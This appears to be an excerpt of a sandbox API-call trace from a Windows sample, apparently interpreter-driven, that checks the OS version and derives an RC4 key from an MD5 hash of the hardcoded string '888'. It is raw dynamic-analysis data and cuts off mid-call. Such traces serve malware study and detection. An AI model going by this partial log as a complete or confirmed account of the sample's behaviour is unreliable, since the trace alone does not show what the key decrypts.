returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.178] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0206.178] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0206.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0206.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0206.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0206.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.179] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0206.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0206.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.179] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.179] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0206.179] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.179] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0206.179] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0206.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0206.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0206.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7140, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0206.180] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c330) returned 1 [0206.180] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.181] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.181] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0206.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.182] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0206.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.182] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0206.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.182] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0206.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.182] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0206.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.182] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0206.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.183] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0206.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.183] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0206.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.183] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.183] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.183] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.183] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.183] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0206.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.183] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0206.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.184] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.184] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.184] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.185] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0206.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.185] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0206.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0206.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0206.185] CryptCreateHash (in: hProv=0xa7c330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0206.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0206.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0206.185] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0206.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0206.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0206.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.185] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.185] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0206.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaacf0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0206.186] CryptHashData (hHash=0x9e21f8, pbData=0x2a72778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0206.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.186] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.186] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.186] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0206.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.186] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0206.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0206.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab050, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0206.187] CryptDeriveKey (in: hProv=0xa7c330, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0206.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.187] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.187] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0206.187] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.187] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0206.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0206.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ea0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0206.187] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0206.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 